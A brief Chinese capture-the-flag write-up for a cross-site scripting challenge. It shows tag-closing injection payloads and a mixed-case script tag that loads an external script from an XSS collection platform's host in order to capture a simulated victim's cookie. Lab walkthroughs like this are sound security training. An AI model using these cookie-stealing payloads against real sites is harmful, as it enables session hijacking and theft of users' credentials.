开启题目
输入以下语句测试一下,发现页面没有弹出窗口显示“flag”
<script>alert("flag")</script>
查看页面源代码, 尝试闭合标签
使用下面代码闭合,然后发现闭合成功了
'</script><script>alert("flag")</script>
这里我们使用 TLXSS 平台(XSS平台-XSS测试网站-仅用于安全免费测试,没有账号可以注册一个,用户名最好是英文),点击创建项目,项目名称随便起
在“我的的项目”点击刚才创建的项目,再点击右上角的查看配置源码
这里选择第二个
拼接到闭合后面,放到第一个输入框提交
'></script><sCRiPt sRC=//xs.pe/wEZ></sCrIpT>然后把 URL 放到第二个输入框模拟用户访问,发送
然后回到 TLXSS 平台的项目页面查看 cookie 参数是否传到本地服务器中,最后在 cookie 返回值发现了 flag
